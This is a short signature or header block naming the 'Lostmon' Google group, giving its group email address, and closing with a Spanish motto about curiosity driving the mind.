Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...